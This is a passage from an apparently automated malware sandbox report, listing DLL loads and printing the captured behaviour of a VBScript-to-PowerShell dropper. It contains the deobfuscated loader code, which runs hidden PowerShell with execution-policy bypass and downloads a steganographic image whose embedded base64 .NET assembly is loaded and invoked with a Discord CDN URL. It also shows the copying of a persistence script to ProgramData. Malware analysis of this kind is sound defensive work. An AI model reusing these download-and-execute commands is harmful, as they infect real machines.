        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") desafiar = ("$ceremoniaticamentebricabraquedigbricabraque = '") & bizarramente & "'" desafiar = desafiar & ";$bricabraqueWjuxd = [bitongasybitongastencosteladom.Tencosteladoxt.encosteladonceremoniaticamenteoding]::Uniceremoniaticamenteodencostelado.GencosteladotString(" desafiar = desafiar & "[bitongasybitongas" desafiar = desafiar & "tencostelado" desafiar = desafiar & "m.ceremoniaticamentebricabraque" desafiar = desafiar & "nvencostelador" desafiar = desafiar & "t]:" desafiar = desafiar & ":Frbricabraque" desafiar = desafiar & "mbabitongas" desafiar = desafiar & "encostelado64bitongastring( $ceremoniaticamente" desafiar = desafiar & "bricabraqued" desafiar = desafiar & "igbricabraque.rencostelado" desafiar = desafiar & "passanditola" desafiar = desafiar & "ceremoniaticamenteencostelado('" desafiar = desafiar & "DgTrencostelado" desafiar = desafiar & "','" desafiar = desafiar & "A" desafiar = desafiar & "') ))" desafiar = desafiar & ";passanditobricabraquewerbitongashell.encosteladoxencostelado -windowbitongastylencostelado hiddencosteladon -encosteladoxencosteladocutionpassanditoolicy bypassanditoasbitongas -Nopassanditorofilencostelado -command $OWjuxD" desafiar = Replace(desafiar,"passandito","p") desafiar = Replace(desafiar,"ceremoniaticamente","c") desafiar = Replace(desafiar,"encostelado","e") desafiar = Replace(desafiar,"bricabraque","o") desafiar = Replace(desafiar,"bitongas","s") mesosterno1 = "passanditobricabraquewerbitongashell -ceremoniaticamentebricabraquemmand " mesosterno1 = Replace(mesosterno1,"ceremoniaticamente","c") mesosterno1 = Replace(mesosterno1,"bitongas","s") mesosterno1 = Replace(mesosterno1,"bricabraque","o") mesosterno1 = Replace(mesosterno1,"passandito","p") mesosterno = mesosterno1 & """" & desafiar & """" Cama.Run mesosterno, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/Vm93m", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZ
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
